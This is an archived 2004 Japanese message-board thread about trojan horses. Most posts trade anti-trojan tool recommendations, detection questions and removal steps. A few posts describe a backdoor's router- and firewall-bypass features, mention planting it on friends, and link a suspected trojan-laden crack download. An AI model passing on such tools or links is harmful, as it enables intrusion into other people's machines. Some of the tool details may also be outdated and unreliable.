☆☆トロイの木馬☆☆2台目

■掲示板に戻る■

☆☆トロイの木馬☆☆2台目

1 ：名無しさん＠お腹いっぱい。 ：04/06/15 18:14: トロイの木馬の現状とそれを取り巻く状況について語るスレです。

ネット犯罪の被害者になってしまった方は、まず警察にご相談下さい。

セキュリティー関係で質問ある方は下記へどうぞ。
ウィルス情報＆質問　総合スレッド☆Part20
http://pc5.2ch.net/test/read.cgi/sec/1086098775/
セキュリティ初心者質問スレッドpart43
http://pc5.2ch.net/test/read.cgi/sec/1087093973/
エロサイト見てたら…助けてください！ part28
http://pc6.2ch.net/test/read.cgi/pcqa/1086932629/

前スレ
☆☆トロイの木馬☆☆
http://pc5.2ch.net/test/read.cgi/sec/1052242064/
関連スレ
【フリー版】トロイ対策 a scuared 2【あり】
http://pc5.2ch.net/test/read.cgi/sec/1077204396/
2 ：名無しさん＠お腹いっぱい。 ：04/06/15 18:15: T用語辞典 e-Words ：トロイの木馬【Trojan Horse】
ttp://e-words.jp/w/E38388E383ADE382A4E381AEE69CA8E9A6AC.html
スタートアップに関して日本語で詳しく解説されているページ。
ネットワーク攻撃関連用語集も必見。
ttp://www.geocities.jp/bruce_teller/security/leakytrojan.htm

アンチトロイ他セキュリティソフトの情報
Anti-trojan Software Reviews(英語)
ttp://www.anti-trojan-software-reviews.com/index.htm
wilders.org security advisors(英語)
ttp://www.wilders.org/index.htm
Rokop Security Foren (独語)
ttp://www.rokop-security.de/main/index.php
各Firewallのトロイ抑止能力テスト表 (英語)
http://www.firewallleaktester.com/tests.htm
3 ：名無しさん＠お腹いっぱい。 ：04/06/15 18:15: アンチトロイソフト
a2（無料版あり。ａイって文字化けするのは仕様w）
ttp://www.a-2.org/en/
ewido （無料版あり。但し常駐保護機能は有料版じゃないと使えない）
ttp://www.ewido.net/en/?section=products
Tauscan（常駐保護する機能あり）
ttp://www.agnitum.com/products/tauscan/
TDS-3 （無料版あり）
ttp://tds.diamondcs.com.au/
Swat It(フリーソフト)
ttp://swatit.org/index.html
PestPatrol
ttp://www.pestpatrol.jp/
Trojans First Aid Kit 5.01
ttp://www.wilders.org/downloads.htm

システム・モニタリング・ツール
SSM(System Safety Monitor)
ttp://maxcomputing.narod.ru/ssm.html?lang=en
Registry Prot スタートアップを監視するシンプルなソフト
ttp://www.diamondcs.com.au/index.php?page=regprot

オンライン・チェック
Free online Trojan Scanner
ttp://www.trojanscan.com/
a2 オンライン・チェック
ttp://onlinecheck.emsisoft.com/en/
Firewall Leak Tester
（テストトロイを持ち帰って自分の環境の対トロイ抑止力のレベルを計るのにも利用できる）
ttp://www.firewallleaktester.com/
4 ：1 ：04/06/15 18:15: 以上テンプレ終了。
間違いがあれば補完よろしくお願いします。

ちなみにおいらはewidoとRegistryProt使ってます。
5 ：名無しさん＠お腹いっぱい。 ：04/06/15 18:28: アホな質問だが・・・
マカフィーでトロイの木馬(zip)見つかったんだけど
これって解凍しなければ問題なしだよね？

マカはトロイ侵入阻止してくれるけど
ごくたまにすり抜けるファイルがあるようです。
昨日アップデートあったから大丈夫になったかもしれんが。
6 ：名無しさん＠お腹いっぱい。 ：04/06/15 19:00: >>5
zipの中にトロイが入ってるだけのファイルなら削除するだけで大丈夫なはずだが。
7 ：名無しさん＠お腹いっぱい。 ：04/06/15 19:58: torojanNotifier.win32.small.a
torojan.js.offiz

この2つのトロイどういう事するのか教えてね！
8 ：名無しさん＠お腹いっぱい。 ：04/06/15 23:08: ●.....●..●..●...●●..●●...●●..●●●....●●●●..●●.....●●●..●..●

無料のウイルス対策ソフトなどのセキュリティソフト一覧
http://www.geocities.co.jp/SiliconValley-Cupertino/2010/security.html

●.●.●.●..●...●●.●..●●.●●......●..●●...●●...●●●.....●.●...●
9 ：名無しさん＠お腹いっぱい。 ：04/06/15 23:10: >7
自分でgoogleで調べてね！
10 ：名無しさん＠お腹いっぱい。 ：04/06/16 02:28: トロイに限って言えばRegistryProtだけでほぼ完璧だと思うが。
11 ：名無しさん＠お腹いっぱい。 ：04/06/16 02:38: >>4
乙。
＞間違いがあれば補完よろしくお願いします。
ぱっと見て気になったのは下記のとおり。

>>1
関連スレ
【フリー版】トロイ対策 a scuared 2【あり】
http://pc5.2ch.net/test/read.cgi/sec/1077204396/
(※) × - a scuared　○ - a squared
（a2スレなんだがスレタイが間違って立てられている。）

>>3
TDS-3 （30日試用版あり）
ttp://tds.diamondcs.com.au/
Swat It(無料版あり)
ttp://swatit.org/index.html
12 ：名無しさん＠お腹いっぱい。 ：04/06/16 08:37: 質問。
トロイ…というかBOとかのRASツールってルーターを
突破できんの？
ServerがLAN内でListenして待ってようが、Clientが
WAN側のアドレスにいくらアクセスしようが
繋がらない気がするんだけど…。
13 ：名無しさん＠お腹いっぱい。 ：04/06/16 09:52: >>9
ttp://www.wilderssecurity.com/showthread.php?t=32823&page=1
上記にSSMやRegistryProtなどレジストリモニターの比較があるぞよ。
14 ：名無しさん＠お腹いっぱい。 ：04/06/16 17:57: >>9
自分でgoogleで調べたけどどこにもなかった。
15 ：名無しさん＠お腹いっぱい。 ：04/06/16 18:11: 最近トロイの木馬を踏んでしまったんですけど、そのときアンチウイルスソフト駆除、削除が失敗してしまいました。
その後、ウィルススキャンをしてみても、見つかりません。
MS-DOSで、netstat -aをしてみると、かならずブラウザやメールソフトを閉じているにもかかわらず、ESTABLISHとでます。
アンチウイルスソフトでトロイの木馬は検出しにくいと聞くんですけど、どうなんでしょうか？
踏んだ時にはしっかり発見できたんですけどスキャンじゃ見つからないんです。
16 ：名無しさん＠お腹いっぱい。 ：04/06/17 00:08: >>12
ttp://www.nsclean.com/psc-bst.html
Backdoor Beast 2.05の新しい機能

- LANBypass feature (reverse connection)もしくはpassive to passive connection機能と言う人もいる。
このトロイがアップデートしたとき、Beastの公式Forumに、無事にルーターを使っている友人に
トロイを仕込むことが出来ました。という喜びの書き込みがたくさんありましたよ。
DLL Injection機能はZoneAlarmFreeやTrendmicroのfirewall（Trendmicroのfirewallは
そもそもapplicationを監視する機能が無かったと思ったが。）などはBypassしますし。

>>15
それだけの情報ではコメントのしようがないと思うが。
アンチウイルスソフトがすでにquarantine検疫（隔離）したのでは？
アンチウイルスソフトのログは見ましたか？

お使いのOSがWindows NT4/2K/XP/2003.なら
DiamondCS OpenPorts v1.0のログを貼ってみれば、詳しい人がコメントしてくれるかも。
ttp://www.diamondcs.com.au/openports/
17 ：名無しさん＠お腹いっぱい。 ：04/06/17 19:09: 前スレを見てRegistryProtを入れてみたのですが
Windows(98SE)を起動する度に

HKEY=HKEY_CLASSES_ROOT
PATH=vbsfile\shell\open\command
NAME=
DATA=

と出てきます。毎回｢いいえ｣を選ぶのですが
もしかしてトロイにやられてるのでしょうか？
AntiVirとSwat It!では何も出てきませんでした。
Kerioも何も反応しません。
18 ：名無しさん＠お腹いっぱい。 ：04/06/18 01:20: >>17
RegistryProtは
ttp://www.security-forums.com/forum/viewtopic.php?t=3752&sid=d0a7c803821fd976b66bd8ebf117b03c
上記の７番が書き換えられないように監視しているんだろうけど。

トロイがよく使うshell spawningのスタートアップの方法で、vbsに関連付けることは
一般的ではないし。(exeが一番一般的）
NAME=
DATA=
が空欄であるからRegistryProtの誤動作ではないのかい。
自分がWindows(98SE)で使っている時には、そのような奇妙な動作は一度も起きなかったが。

RegistryProtのヘルプファイルにshell spawningを使った実際にトロイが仕掛けられる例が紹介されているから、
一度それと比べてみればどうだろう。
19 ：名無しさん＠お腹いっぱい。 ：04/06/18 03:03: レスどうもありがとう。上記リンクとヘルプ、参照しました。
どうやら誤作動のようですね。念のためググッてみたら海外の掲示板にも
同じような質問がありましたw そこでは「トロイではないだろうが原因は
わからない」だそうです。とりあえず心配なさそうなので放っておきます。
20 ：名無しさん＠お腹いっぱい。 ：04/06/18 04:25: 全てのトロイがレジストリに書き込むとは限らない点を考えると
環境の問題があるので一概には言えないが、RegistryProtではいかにも落ち着かない気がするが？
21 ：19 ：04/06/18 07:46: >>20
そうですか…へなちょこマシンなんでちゃんと動くか判らないけど
試しにa2でも入れてみます。ewidoもWin98に対応してくれないかなぁ…
22 ：19 ：04/06/18 08:23: あれ？ a2って常駐保護できないのか！
わざわざアカウント登録までしたのに…orz
フリーで常駐保護できるソフトってあるんでしょうか…
23 ：名無しさん＠お腹いっぱい。 ：04/06/18 08:25: ＴｏＲｏＩ bastar
24 ：19 ：04/06/18 08:45: おお！素早いレスどうも！

と思ったらＴｏＲｏＩ bastar…orz
busterじゃなくてbastarなうえに信頼性が…
いやでもフリーだとそんなもんか…
25 ：名無しさん＠お腹いっぱい。 ：04/06/18 09:38: >>16
reverse connection て具体的に何やってるんでしょうか？
26 ：名無しさん＠お腹いっぱい。 ：04/06/18 10:31: spybotにもレジストリ監視機能がついた
スパイウェア防ぐためにいれてる
27 ：名無しさん＠お腹いっぱい。 ：04/06/18 12:42: tp://www.geocities.co.jp/SiliconValley-SanJose/4431/files/nycrkldr15.zip

これ何ていうトロイか分ります？
28 ：名無しさん＠お腹いっぱい。 ：04/06/18 13:16: そういうもの貼らんでほしいな・・スレの性格変わっちゃうから
29 ：名無しさん＠お腹いっぱい。 ：04/06/18 16:48: >>27
nyのクラックはやめとけ
30 ：名無しさん＠お腹いっぱい。 ：04/06/18 17:04: >>29
クラックは興味ない
なんていうトロイか知りたいの
31 ：名無しさん＠お腹いっぱい。 ：04/06/20 05:42: >>26
いつの間にかアップデートしてたんだ
早速いれてみた
>>13のリンク先みるとregprot+teatimerでレジストリ関係は安全かな
ただ>>20みたいのはどう防ぐんだろう
32 ：名無しさん＠お腹いっぱい。 ：04/06/21 13:20: netdevil1.5を自分のマシンに使ってみたんだけど
error[10061]: no server running at address.
と出て接続ができません(;´Д`)ﾉ
ターゲットはきちんと起動してるし、ファイアウォールも切ってあるのに
接続できないのは何でなんだろ・・・・。
33 ：名無しさん＠お腹いっぱい。 ：04/06/21 14:09: >>31
ただ>>20みたいのはどう防ぐんだろう

今のところ、SSMしかなさそうだね。
34 ：名無しさん＠お腹いっぱい。 ：04/06/23 16:06: tcp ポート&　UDP　１３７138 139を使うトロイの木馬は、何ですか？
35 ：名無しさん＠お腹いっぱい。 ：04/06/23 17:06: TCP: 139 UDP: 137 138 のポートをオープンにするトロイの木馬って何ですか？
36 ：名無しさん＠お腹いっぱい。 ：04/06/23 17:15: >>34-35
http://www.cwo.co.jp/kaiin/center/fusei/index_xp.html

これじゃない？違ってたらｽﾏｿ
37 ：名無しさん＠お腹いっぱい。 ：04/06/25 21:23: a2の日本語化パッチって無いですか？
38 ：名無しさん＠お腹いっぱい。 ：04/06/25 21:49: こっちってこういう話する場じゃない？
スレ違いだったらスマソ。

http://www.itmedia.co.jp/enterprise/articles/0406/25/news076.html

2004/06/25 18:31 更新
大手サイトに仕込まれたトロイの木馬に要注意
一部のメジャーサイトにアクセスすると、画像ファイルに組み込まれた悪質な
JavaScriptにより、知らない間にトロイの木馬をダウンロードさせられ、
スパムの踏み台にされる可能性がある。（IDG）
39 ：名無しさん＠お腹いっぱい。 ：04/06/26 02:23: >>37
ﾄﾞｿﾞｰ( ･∀･)つhttp://pc5.2ch.net/test/read.cgi/sec/1077204396/92-97
40 ：名無しさん＠お腹いっぱい。 ：04/06/27 00:41: http://www.nurs.or.jp/~void/OkinawaDict/o-dic/park.dic
... 接尾語付き地名 # 広域公園: 沖縄市 (沖縄県) そうごううんどうこうえん ... ぼうがおうかこうえん希望ヶ丘公園接尾語付き地名 # 近隣 ...
http://www.nurs.or.jp/~void/OkinawaDict/o-dic/park.dic -
↑これかなりやばいかも、クリックすると勝手に変なファイルがダウンロードされる。
もしかしてトロイかも・・・・　気をつけてね
41 ：名無しさん＠お腹いっぱい。 ：04/06/27 00:57: >>40
どこがトロイだよ？
42 ：名無しさん＠お腹いっぱい。 ：04/06/27 03:43: >40
沖縄辞書…(w
43 ：名無しさん＠お腹いっぱい。 ：04/06/27 08:36: >>40
バーカ
44 ：名無しさん＠お腹いっぱい。 ：04/06/27 12:23: 沖縄の方の方言ば喋る人たちにゃ便利がよか辞書ばってんが
わっちらぁみたいな標準語喋る人間にゃいらんでがんす。
45 ：名無しさん＠お腹いっぱい。 ：04/06/28 22:07: >>18
このRegistryProtっていうのはログとか見れないんですかね？
入れてみたんだけどそれらしいファイルが見当たらないんですが。
46 ：名無しさん＠お腹いっぱい。 ：04/06/28 22:21: >>45
ログは残せないかと。

StartupGuard
http://www.acelogix.com/download.html
他スレで紹介されてたけどこれはどこらへんまで監視できるんだろうね。
インストーラ付きだったからちょっと今は入れるのパスした。
47 ：名無しさん＠お腹いっぱい。 ：04/06/28 22:32: >>46
サンクス。

それはスタートアップに何かが加えられた場合に確認を求めるだけみたいだね。
許可か拒否か。
48 ：：04/06/28 23:50: plala
49 ：名無しさん＠お腹いっぱい。 ：04/06/29 01:51: さっきマカフィーのオンラインウイルススキャンしたら
「HTML/Suar」ってゆうウイルス検出しました。
なんか普通に消せたけど、大丈夫なのかな・・・
50 ：名無しさん＠お腹いっぱい。 ：04/07/02 00:18: 新たなトロイの木馬攻撃で浮き彫りになるIEの危険性。
Norton Antivirusなどのウイルス対策プログラムでも探知できない。
http://www.itmedia.co.jp/enterprise/articles/0407/01/news061.html

オンライン金融業界にとって深刻な脅威。
51 ：名無しさん＠お腹いっぱい。 ：04/07/03 06:43: “見るとアプリが落ちるGIF”の正体はトロイの木馬である可能性が
http://internet.watch.impress.co.jp/cda/news/2004/07/02/3750.html
52 ：名無しさん＠お腹いっぱい。 ：04/07/03 21:22: >>51
そこのBHODemonの機能があまりわからん。
一回落としてみたが、NortonとNetTransport、Adobeが引っかかった・・・？
53 ：名無しさん＠お腹いっぱい。 ：04/07/03 21:43: >>52
SpybotにもBHOを管理できるツールは付いてるよ。自分で判断しないといけないけど。
Demonのほうは、BHOlistという危険リストをもとに
安全なものとそうでないものが色分けされて表示されるんじゃないのかな。
チェックを外せばそのBHOを殺せる。
54 ：名無しさん＠お腹いっぱい。 ：04/07/04 04:03: 個人的にはBHOの管理や監視は、HijackThisが一番いいと思う。
自分で判断しないといけないのがやぱりネックだけど・・・。
55 ：名無しさん＠お腹いっぱい。 ：04/07/04 10:43: セキュリティやる以上、自分の正確な判断が必要なのは仕方のないことなのでしょう。
56 ：名無しさん＠お腹いっぱい。 ：04/07/05 10:40: TroijanCheck5とregprotってどちらかで良いんですかね？
被ってますか？
57 ：名無しさん＠お腹いっぱい。 ：04/07/06 00:10: TroijanCheck5って何？
58 ：名無しさん＠お腹いっぱい。 ：04/07/06 00:19: トロイ専用のやつじゃなかったっけ
今は更新してないみたいだけど
59 ：名無しさん＠お腹いっぱい。 ：04/07/06 00:34: >>58
更新が無くても使えるって事はレジストリとかプロセスの監視が出来るのかな？
って事は常駐ソフトか、調べてみよ。
60 ：名無しさん＠お腹いっぱい。 ：04/07/06 00:40: とりあえずTrojanではないかと。実態は知らない。
61 ：名無しさん＠お腹いっぱい。 ：04/07/06 01:12: >>56
TroijanCheck5なら6でも同じことがえきるので6の方がいいかな。
最近更新してないから使ってないけど。
自分はレジストリやスタートアップの監視は最近は、
Spybot - Search & DestroyのTiaTimaerを常駐させて監視させているよ。

>>59
TroijanCheck6は一応常駐して監視してくれますよ。
少し設定をいじらないといけないですけど。
ttp://www.trojancheck.de/
62 ：名無しさん＠お腹いっぱい。 ：04/07/06 02:19: TrojanCheck5も6も開発終了。
両方ともドイツ語ソフトだが、TrojanCheck5には英語化パッチがある。
両方とも日本語化パッチはない（少なくとも私は見たことがない）。
後継ソフトはewidoだが、>>3にあるようにFree版は常駐保護機能が使えない。

TrojanCheck v5.0.4.1 Final
ttp://web.archive.org/web/20030618201938/http://wilders.org/HTMLobj-925/install_trojancheck5041.exe
英語化パッチ
ttp://web.archive.org/web/*/http://www.wilders.org/HTMLobj-833/english.lng
readme.txt
ttp://web.archive.org/web/*/http://www.wilders.org/HTMLobj-834/readme.txt

regprotが反応しないものにTrojanCheck5が反応する場合があるので、
TrojanCheck5を入れる価値はあると思って私は入れている。
63 ：国連な成しさん ：04/07/06 18:07: unko-!
64 ：名無しさん＠お腹いっぱい。 ：04/07/07 00:02: すいません、NETSTATでアクセス状況を見てみると常にポート５０００が開いてる
状況なんです。ノートンでスキャンをかけてみてもなんの反応もありません。
これはトロイが機動しるんでしょうか？
65 ：名無しさん＠お腹いっぱい。 ：04/07/07 00:08: >>64
ぐぐったら一番上に関連記事が出てるんだけどなぁ･････
66 ：名無しさん＠お腹いっぱい。 ：04/07/07 00:26: >>53
BHODemon入れてみたけど、ちょっと使いづらいね。
Spybotの方が多機能だし、使いやすい。
>>54
HijackThisってリストを吐き出すやつだっけ?
67 ：名無しさん＠お腹いっぱい。 ：04/07/07 02:21: >>66
確かそう。かさばらないからHDの片隅にでも。
Hijackthis
ttp://higaitaisaku.web.infoseek.co.jp/HijackThis.exe

Hijackthisを実行したときにBHOの一覧はO2に表示される。
O4には自動起動エントリも表示される。
基本的な使い方は不振な活動をするものを自己判断でFixをする。
するとレジストリエントリーから抹消&バックアップされる。
あとはその不振な活動をしていたexeやdllをその場で圧縮しごみ箱に移す。
あとで必要と分かったならRestoreとexe、dllの圧縮を解凍し元に戻す。

HijackThisログ解析入門
ttp://higaitaisaku.web.infoseek.co.jp/htkaiseki.html
68 ：66 ：04/07/07 02:32: >>67
有り難い！
早速使ってみるよ。
69 ：名無しさん＠お腹いっぱい。 ：04/07/07 08:01: >>67
最新のだと2バイト文字に対応しているみたいね。
ttp://www.softpedia.com/public/cat/10/17/10-17-69.shtml
70 ：名無しさん＠お腹いっぱい。 ：04/07/07 08:22: >>69
最新のは1.98.0.0でいいのかな？
使ってみたけど確かに対応しているようで、
今まで文字化けしていたものも文字化けしないで表示できて分かりやい。
教えてくれてありがとう。
71 ：名無しさん＠お腹いっぱい。 ：04/07/08 18:10: アンチウィルス＋regprot＋tiatimerで常駐面は十分だろうか？
72 ：名無しさん＠お腹いっぱい。 ：04/07/08 18:13: 厨増えて糞スレ化
73 ：名無しさん＠お腹いっぱい。 ：04/07/08 21:34: ＞tiatimer
ﾌﾟｯ

それ以前にteatimerは現状、出来が悪い。
74 ：名無しさん＠お腹いっぱい。 ：04/07/08 21:41: >>73
>>18のリンク先見てみな？そんなに悪いとは思えないけど。
75 ：名無しさん＠お腹いっぱい。 ：04/07/08 22:00: >>13見ると>>71が正解かもね。
76 ：74 ：04/07/08 22:17: 間違えた＿|￣|○
>>75ありが㌧
SSMもいいみたいだね。
77 ：名無しさん＠お腹いっぱい。 ：04/07/08 23:28: >>74
TeaTimerは使っているが完成度が低い。できたばかりだからこんなものか。
>>76
SSMは確かに効果的だが、使うと面倒なのも確か。
守られてるなという実感はわく。
78 ：名無しさん＠お腹いっぱい。 ：04/07/09 23:47: まあ俺も似たようなもんだが、
常駐はnod32＋sygate＋regprot＋teatimer
こんなところ。
79 ：名無しさん＠お腹いっぱい。 ：04/07/14 21:12: で、結局＞＞３の中のどれが言い訳？
80 ：名無しさん＠お腹いっぱい。 ：04/07/15 20:43: 初心者の者ですが教えてください。

今日ウイルス検索してたら「TROJ_WINSHOWZ」というウイルスに感染
してることが分かりましたがいろいろ調べましたが検索にかかりません。
ご存知の方対策、駆除方、感染した時の悪影響を教えてください。

何分ウイルス感染初めてなものでパニクってます、よろしくお願いします。
81 ：名無しさん＠お腹いっぱい。 ：04/07/15 21:14: マルチは嫌われるんだよ
82 ：80 ：04/07/15 21:36: >>81
すみません。

何とか駆除出来たようです。
ありがとうございました。
83 ：名無しさん＠お腹いっぱい。 ：04/07/16 01:50: マルチ＆解決方法を書かない。
最凶だな。
84 ：名無しさん＠お腹いっぱい。 ：04/07/16 09:24: >>79
金払う気あるならkasperskyにしたら？
これとスパイウェア対策だけで十分だろ。
85 ：名無しさん＠お腹いっぱい。 ：04/07/16 22:15: 昨夜あたりからやたらUltor'sトロイがすげぇアタックして来る。
なんなんだよ一体…orz
86 ：名無しさん＠お腹いっぱい。 ：04/07/16 22:33: >>85
うちもそうだよ
ちなみに相手IPは全て北京だった
87 ：名無しさん＠お腹いっぱい。 ：04/07/16 23:12: うちは台湾だったりオーストラリアだったりだ。
88 ：名無しさん＠お腹いっぱい。 ：04/07/16 23:15: 北京が殆どだけど1件ソウルがあったな。
89 ：名無しさん＠お腹いっぱい。 ：04/07/17 00:23: 今ソウルからｷﾀｰ
そろそろ本気でウザイ。
90 ：名無しさん＠お腹いっぱい。 ：04/07/17 06:55: あんまり気にしてると禿げるぞ
91 ：名無しさん＠お腹いっぱい。 ：04/07/18 21:57: ルータ導入したら？
俺も以前はアジアからのアクセスで怒涛の警告ラッシュが続いたけど
ルータのお陰で今はさっぱりだよー
92 ：あぼーん ：あぼーん: あぼーん
93 ：名無しさん＠お腹いっぱい。 ：04/07/19 21:28: どうつっこみ入れたらいいのやら。
まあ>>92氏ね。そして通報されろ。
94 ：名無しさん＠お腹いっぱい。 ：04/07/20 23:41: アケ板のスレッド一覧を参照するとUnix.Penguinっていうトロイの木馬を検出する。
ちなみにNortonAntiVirus2004使ってますけど…
これってどーなん？
95 ：名無しさん＠お腹いっぱい。 ：04/07/21 01:14: うちはOEの受信トレイからペンギンが出た
間違って検疫したらメール消えた
96 ：名無しさん＠お腹いっぱい。 ：04/07/21 14:57: Ewidoの、左側のメニューボタンに使われているフォントの名前わかる人いませんか？
使わなさそうなフォントを整理していたらEwido立ち上げても何にも表示されなくなってしまいました。
フォントを元に戻してもEwidoを再インストールしても文字が表示されないんですよね。
97 ：名無しさん＠お腹いっぱい。 ：04/07/22 09:13: Backdoor Yung(Young)に関する詳しい情報をお持ちの方はいませんか？
やっとのお思いで見つけたサイトが英語じゃなかったり・・。
98 ：名無しさん＠お腹いっぱい。 ：04/07/22 10:34: "backdoor young"でぐぐったらとんでもない中にまぎれこんで・・・
99 ：名無しさん＠お腹いっぱい。 ：04/07/23 16:23: テンプレにトロイが使うポート一覧があったらよかったのに。
100 ：100 ：04/07/23 16:44: ｽﾞｻ━━━━⊂(ﾟДﾟ⊂⌒｀つ≡≡≡━━━━!!
>>99
http://www.emsisoft.com/en/kb/portlist/
メモっとけ
101 ：名無しさん＠お腹いっぱい。 ：04/07/24 14:21: すみません、HiJackThisなんですが、
http://www.geocities.co.jp/SiliconValley-SanJose/2451/commission.html
の「スパイウェア関連辞書ファイル」に日本語辞書があったんですが
適用方法が分かりません・・・。Configで設定するのかと思ったんですが
辞書ファイルの設定に関する項目がないみたいなんですけど・・・。
これどのように設定すればよいのか分かる方いらっしゃいませんか？_|￣|○
102 ：名無しさん＠お腹いっぱい。 ：04/07/24 14:33: >>101
E-WordChanger2000用の辞書だろ。あれは使えねーよ。
そこまでして日本語化する必要もないしな。
103 ：101 ：04/07/24 14:44: たしかに特に日本語化の必要はないんですが、数分の手間（とタダ）で出来るなら
一応やっておこーかな、と思ったんですがこれ専用日本語化ソフト用の辞書ファイルだったんですね・・・
勉強になりました、今後「#32770～」の辞書ファイルには気を付けます（？）
ありがとうございました
104 ：名無しさん＠お腹いっぱい。 ：04/07/24 23:50: トロイの木馬って動画ファイルに入ってることってありますか？
105 ：名無しさん＠お腹いっぱい。 ：04/07/25 00:19: あるんじゃね
106 ：名無しさん＠お腹いっぱい。 ：04/07/25 00:41: 「ビンラディン氏の自殺写真」実はトロイの木馬
Yahoo! News
ttp://headlines.yahoo.co.jp/hl?a=20040724-00000003-zdn_ep-sci
ITmedia
ttp://www.itmedia.co.jp/enterprise/articles/0407/24/news008.html

トロイの木馬の情報
Backdoor.Hacarmy
ttp://www.symantec.com/region/jp/sarcj/data/b/backdoor.hacarmy.html
BackDoor-AZV
ttp://www.mcafeesecurity.com/japan/security/virB2003.asp?v=BackDoor-AZV
107 ：名無しさん＠お腹いっぱい。 ：04/07/26 22:32: Backdoor.Trojan　と名前のウイルスをノートン君が発見したんですが…

どーすればいいのでしょうか？　

それにインターネットを開くと　スパイウェアのポップアップが出現します

誰か助けてください！
108 ：名無しさん＠お腹いっぱい。 ：04/07/26 22:34: 駆除すればいい
109 ：名無しさん＠お腹いっぱい。 ：04/07/26 22:53: >>107
ノートンにきけ
110 ：名無しさん＠お腹いっぱい。 ：04/07/26 23:46: Backdoor.Padodor.BQにかかったが情報一ッしかない
111 ：名無しさん＠お腹いっぱい。 ：04/07/26 23:53: いくらでもある
http://www.google.co.jp/search?num=50&hl=ja&inlang=ja&ie=UTF-8&q=Backdoor.Padodor&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=
112 ：名無しさん＠お腹いっぱい。 ：04/07/27 00:15: >>111
ありがと
113 ：名無しさん＠お腹いっぱい。 ：04/08/03 16:54: AVGがTrojan horse Back Door.Agent.2.Hを発見しました
っていう警告ウィンドウがでるんですけど
指摘しているフォルダが存在しません
これは放っておいて大丈夫なんでしょうか？
114 ：名無しさん＠お腹いっぱい。 ：04/08/03 17:27: >>91 だよな。漏れのところも中国からのアタックが激しかったがルータを入れたらピタリと止まった。
ルータなんてそんなに高い物じゃないので入れてない香具師は入れる事をおすすめするよ。
115 ：名無しさん＠お腹いっぱい。 ：04/08/03 17:37: >>114
全然止まっているわけじゃねえべさ
理屈がわかんねえのか？
116 ：名無しさん＠お腹いっぱい。 ：04/08/03 17:41: >>113
どうせ、ここに登録されているんだろう
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=9286
117 ：名無しさん＠お腹いっぱい。 ：04/08/03 17:43: 多分、ルーターで弾かれてPC本体に届いていない、って意味で言ってるんだべ。
どちらにせよ、PCのファイヤーウォールで弾くより負荷もかからんし、
ルーター入れても損はないだろ。
118 ：名無しさん＠お腹いっぱい。 ：04/08/03 23:37: >>113
知り合いも同じTrojan horse Back Door.Agent.2.Hの警告が出たって言ってたけど
web検索しても無いんだよね。
どう対処したらいいのか俺も知りたい。
119 ：名無しさん＠お腹いっぱい。 ：04/08/04 01:04: 最近辞書登録してた顔文字が消えてたり、PCがずっとビジー状態だったり、勝手に電源消えたりしたので
ノートンのログみたら、Trojan horseに感染してるらしいって出てました。駆除しようとしたけど、
スキャンしてると電源が消えて正常なスキャンができないんです。

どうしたらいいんでしょうか･･･。助けてください｡･ﾟ･(ノД｀)･ﾟ･｡
120 ：名無しさん＠お腹いっぱい。 ：04/08/04 01:55: >>119
セーフモードでやれ。
121 ：名無しさん＠お腹いっぱい。 ：04/08/04 07:13: Trojan.Bookmarker.Genを自動削除したという警告をノートン先生（2004）が
毎日のようにくれるんだけど、流行ってるんですか、これ。

前に一度感染したのか、「見つけたけど削除できない」って警告が続いて、
（でも指定の場所には該当ファイルが見当たらない）
そのときはノートン2003だったので、これを2004に変えたら、
自動削除したというメッセージにはなってくれたんだけど、気になります。
122 ：名無しさん＠お腹いっぱい。 ：04/08/04 08:30: >>121
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
トロイが追加した実行ファイルへのパスが記入されているキーを削除してください。

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\SearchUrl
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SearchUrl
「SearchUrl」を削除してください。

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main
"Start Page""
"Search Bar"
"Search Page"
3つのキーを削除してください。

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Search
「SearchAssistant」を削除してください

お気に入りフォルダのいくつかのリンクおよび、お気に入りフォルダ内のリンクフォルダを作成します。
トロイが追加したブックマークまたはリンクを削除してください。

セーフモードモードで起動して、Trojan.Bookmarker.Genとして検出されたすべてのファイルを削除してください。
123 ：名無しさん＠お腹いっぱい。 ：04/08/04 09:30: ewidoの使い方載ってるサイトはありますか?
124 ：121 ：04/08/04 11:25: >122
ありがとうございます。
ご指摘の部分、全部削除してみました。
警告でなくなるといいなぁ。
125 ：名無しさん＠お腹いっぱい。 ：04/08/05 17:01: ewidoのバージョンアップが来てるね

いつも通りにアップデートをしてたら妙に大きいファイルをダウンロードしてきてビックリ
本家サイトを見るとどうやら無料版と14日間使用版が統合された模様

バージョンアップを実行するといきなりplusの方になってて一瞬ビビった
でもどうやら、14日過ぎるとplusの機能は自動的に使えなくなって無料版に移行する
らしいから、無料で使い続けたいという場合もたぶん心配はいらないだろう

あっ、インストールの時に「background」云々のチェックをあらかじめ外しておけば
最初から無料版が入るのかな？

実際にスキャンしてみると…怪しいファイルが見付かるたびにサイレンの音が鳴って
その都度どうするかを聞いてくる
スキャンしている間はパソコンの前にいないといけない訳だからちょっと面倒かも
126 ：名無しさん＠お腹いっぱい。 ：04/08/05 18:45: 14日間AVGと併用してても大丈夫かな(´･ω･｀)あうあう
127 ：名無しさん＠お腹いっぱい。 ：04/08/05 19:14: >125
解説ありがとうage
スキャンすると、かかるわかかるわスパイウェア……
ad-awareとSpybotも入ってて使ってるんだけどな(´･ω･`)

ewido単独スレってないんだな。なんで？　あってもおかしくないのに。
128 ：名無しさん＠お腹いっぱい。 ：04/08/05 19:41: >>127
（Ewidoに限らず）アンチトロイソフトの利用者がまだ少ないからじゃないかな？
a2のスレはどちらかというと先走りで立てて、途中から良スレになった感じ
129 ：名無しさん＠お腹いっぱい。 ：04/08/05 19:47: 新Verの後、早速うｐだてしてたな
130 ：名無しさん＠お腹いっぱい。 ：04/08/05 19:47: a2＋ewidoスレで(・∀・)ｲｲ!!
131 ：名無しさん＠お腹いっぱい。 ：04/08/05 19:52: >>130
でもEwidoまでなくなるとこのスレの存在意義がなくなるﾖｶｿ(´･ω･`)ｼｮﾎﾞｰﾝ
本当はa2もこっちでやってもいいような気がするけどね。
